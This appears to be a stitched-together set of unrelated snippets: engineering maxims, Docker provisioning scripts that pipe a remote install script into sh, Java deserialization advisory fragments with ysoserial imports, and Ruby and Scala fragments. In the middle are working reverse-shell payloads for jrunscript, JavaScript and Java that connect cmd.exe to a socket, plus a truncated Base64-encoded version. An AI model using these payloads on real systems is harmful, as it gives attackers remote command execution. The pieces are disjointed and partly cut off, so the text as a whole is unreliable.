- Thou shalt place time/space/resource constraints on all otherwise open-ended operations
  - eg: timeouts, result counts, input sizes
- Thou shalt strive to measure any quantitative values that can vary over time or across samples
  - eg: response times/counts, error counts
- Thou shalt not accept, store, transmit, or display a numerical value without its respective units or context
  - eg: timezones, metric/binary prefixes
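```bash
#!/bin/bash -xe
# Export so the setting applies to every apt-get call, not only the first one
export DEBIAN_FRONTEND=noninteractive
apt-get update && apt-get upgrade -y && apt-get -y install git python python-pip
# Install Docker via the upstream convenience script, then docker-compose via pip
curl -s https://get.docker.com | sh
service docker start
pip install -U docker-compose
mkdir /opt/docker.d
```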
```bash
#!/bin/bash -xe
yum update -y
yum install -y git
curl -s https://get.docker.com | sh
service docker start
chkconfig docker on
pip install -U docker-compose
```
Nashorn / Rhino:
- Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
- Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
```javascript
var host="localhost";
var port=8044;
var cmd="cmd.exe";
var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();
```
```java
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
```
Chris Frohoff – Qualcomm Information Security and Risk Management
- Affected Product(s): Java SE 6, Java SE 7
- Fixed in: Java SE 7u25 (2013-06-18), Java SE 8 (2014-03-18)
- Vendor Contact: [email protected]
- Vulnerability Type: Unsafe Object Deserialization
```java
package ysoserial.payloads;
import java.math.BigInteger;
import java.util.Arrays;
import java.util.PriorityQueue;
import java.util.Queue;
import org.apache.commons.beanutils.BeanComparator;
import ysoserial.payloads.annotation.Dependencies;
```
```ruby
#!/usr/bin/env ruby
require 'open3'
def replace(md, strip=false)
  rex = /```([a-zA-Z]+)\n(([^`\n]{3,}\n)*)```\s*```mdexec\n([^`\n]{3,}\n)*```/
  replaced = md.gsub(rex) do |rep|
    int, code = $1, $2
    if !strip
```
```scala
object Test extends App {
  lazy val flow: SplunkEvent => Seq[Email[Alert]] =
    receiveEvent andTap rawTap andThen
    convertToSecurityEvent andMaybeTap eventTap andMaybe
    classifyIfTrained andMaybeTap classificationTap andMaybeSeq
    aggregateByTimeWindow andForEach (_.sortBy(_.event.time)) andForEach
    convertToAlert andForEachTap alertTap andForEachOpt
    createEmail andForEachTap emailTap
}
```